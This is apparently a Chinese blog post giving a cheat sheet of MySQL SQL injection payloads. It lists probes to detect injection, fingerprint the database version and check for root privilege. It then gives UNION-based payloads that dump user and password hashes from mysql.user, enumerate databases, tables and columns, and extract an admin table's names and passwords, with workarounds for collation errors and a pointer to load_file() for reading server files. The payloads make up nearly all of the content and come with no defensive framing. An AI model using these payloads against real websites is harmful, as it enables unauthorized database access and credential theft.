Mysql 基本注入

最新推荐文章于 2024-06-18 10:53:33 发布

大方子

最新推荐文章于 2024-06-18 10:53:33 发布

阅读量1.3k

点赞数 1

分类专栏：技术分享

技术分享专栏收录该内容

93 篇文章 9 订阅

订阅专栏

================================

判断是否存在注入： and 1=1 and 1=2

查看是否为mysql数据库： /*asd ---因为只有mysql支持/* 注释

查看mysql版本： and ord(mid(version(),1,1))>51 /* --- 51的ASCII码代表3，即版本3

具体确定版本号mysql： /*!30000%20s*/ 返回错误表示大于版本3.0,
/*!50000%20s*/ 返回正确表示小于版本5.0
/*!40016%20s*/ 返回正确 /*40015%20s*/ 返回错误 ---则版本为4.0.15
推出： /*!50000 SQL语句*/ 如果当前数据库版本号大于等于50000，SQL语句就执行

查看是不是root权限： and ord(mid(user(),1,1))>114 /*

判断语句查询的字段数： order by 10 或者 union select 1,1,1,1 一个一个增加判断

联合查询(4.0以上的版本支持)：union select 1,2,3,4,5,6,7,8,9,10 from admin

相关函数： system_user()系统用户名
user() 用户名
current_user() 当前用户名
session_user()连接数据库的用户名
database() 数据库名
version() MySQL数据库版本
load_file() 读取本地文件的函数

@@datadir 读取数据库路径
@@basedir MySQL安装路径
version_complie_os操作系统

判断如果有root权限，可以使用load_file()

=====================================

（1）查询数据库用户：

and 1=2 union select GROUP_CONCAT(user,0x5f,password) from mysql.user

（2）查询所有数据库：

and 1=2 union select GROUP_CONCAT(schema_name) from information_schema.schemata
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata)t
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in ('information_schema','performance_schema'))t

（3）查询所有表名：

and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()
and 1=2 union select GROUP_CONCAT(table_name) from (select * from information_schema.tables where table_schema=database())t

（4）查询指定表的所有列：

and 1=2 union select GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database()
and 1=2 union select GROUP_CONCAT(column_name) from (select * from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database())t
注意：之所以限定database是因为可能存在同名表(位于另外数据库)。

当注射后页面显示：
（1）Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
可以使用convert()函数，如：
and 1=2 union select convert(GROUP_CONCAT(name,0x5F,password) using latin1) from admin
似乎可以使用unhex(hex())方式
and 1=2 union select unhex(hex(GROUP_CONCAT(name,0x5F,password))) from admin
（2）Illegal mix of collations for operation 'UNION'
使用hex函数，如：
and 1=2 union select hex(GROUP_CONCAT(name,0x5F,password)) from admin

参考：http://www.07net01.com/security/sqljibenzhuruyuju_585433_1379245164.html

大方子

关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
Mysql 基本注入

================================判断是否存在注入： and 1=1 and 1=2查看是否为mysql数据库： /*asd ---因为只有mysql支持/* 注释查看mysql版本： and ord(mid(version(),1,1))&gt;51 /* --- 51的ASCII码代表3，即版本3具体确...
复制链接

扫一扫

专栏目录